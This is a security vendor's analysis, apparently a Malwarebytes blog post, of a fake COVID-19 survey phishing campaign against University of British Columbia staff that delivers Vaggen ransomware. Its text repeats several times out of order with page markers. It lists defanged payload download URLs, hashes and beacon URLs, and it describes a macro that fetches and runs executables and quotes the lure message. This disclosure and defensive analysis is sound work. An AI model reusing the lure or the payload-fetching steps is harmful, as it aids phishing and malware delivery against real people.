3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1560 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1561 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1562 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1563 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1564 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1565 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1566 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1567 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1568 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1569 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1570 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1571 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1572 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1573 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1574 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1575 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1576 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1577 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1578 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1579 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1580 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1581 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1582 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1583 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1584 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1585 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1586 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1587 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1588 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1589 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1590 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1591 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1592 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1593 of 